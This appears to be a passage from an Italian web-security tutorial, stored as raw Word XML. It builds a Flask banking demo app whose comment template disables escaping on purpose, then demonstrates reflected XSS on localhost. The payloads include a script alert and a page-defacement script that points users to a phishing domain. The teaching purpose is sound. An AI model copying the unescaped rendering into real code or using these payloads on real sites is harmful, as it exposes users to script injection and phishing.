        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prodotto(prodotto_id):</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(DB)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn.cursor()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Posta un commento (POST)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"POST"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"username"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testo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO commenti (prodotto_id, autore, testo) "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"VALUES (?, ?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    (prodotto_id, session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], testo))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Carica prodotto + commenti</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT nome, descrizione, prezzo FROM prodotti WHERE id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (prodotto_id,))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    prod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchone()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT autore, testo FROM commenti "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"WHERE prodotto_id = ? ORDER BY id DESC"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (prodotto_id,))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    commenti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()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prod:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Prodotto non trovato"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> render_template_string(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prod[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prod[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prod[2] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> €/mese&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;hr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h3&gt;Commenti&lt;/h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f utente %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;form method="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;textarea name="testo" rows="2" cols="50"&gt;&lt;/textarea&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;button&gt;Pubblica commento&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lse %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;a href="/login"&gt;Accedi&lt;/a&gt; per commentare&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndif %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;hr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or c in commenti %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;div style="border:1px solid #ccc; margin:5px; padding:5px"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> c[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt;: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> c[1] | safe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lse %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;i&gt;Nessun commento.&lt;/i&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndfor %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;hr&gt;&lt;a href="/"&gt;⬅ Home&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">prod, commenti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">commenti, utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">session.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Anche qui:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ c[1] | safe }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">disabilita l’escape sul testo del commento — vulnerabilità deliberata).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cancella il database (per forzare la creazione della tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">commenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">del bancapiccola.db    # Windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm bancapiccola.db     # macOS/Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia l’app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="355"/>
    <w:bookmarkEnd w:id="356"/>
    <w:bookmarkStart w:id="359" w:name="primo-attacco-reflected-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="544" w:name="sec_8_5"/>
      <w:r>
        <w:t xml:space="preserve">8.5 Primo attacco: Reflected XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="544"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’app è ora vulnerabile. Vai su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS funzionante!')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una finestra di alert del browser che dice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">XSS funzionante!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sopra la pagina di BancaPiccola.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3307080"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_16_una_finestra_di_alert_del_browser_che_dice_XSS_funzionante_s.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3307080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il browser apre un alert.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il tuo JavaScript è stato eseguito su una pagina di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, esattamente come se fosse codice del sito. La SOP non ti aiuta: per il browser, è codice legittimo del sito.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="357" w:name="costruire-un-attacco-reale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Costruire un attacco reale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alert(1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la prova di concetto, non un vero attacco. Costruiamo qualcosa di più cattivo. Vai su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;document.body.innerHTML='&lt;h1&gt;BancaPiccola fuori servizio. Vai su </w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bancapiccola-secure.it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/h1&gt;'&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
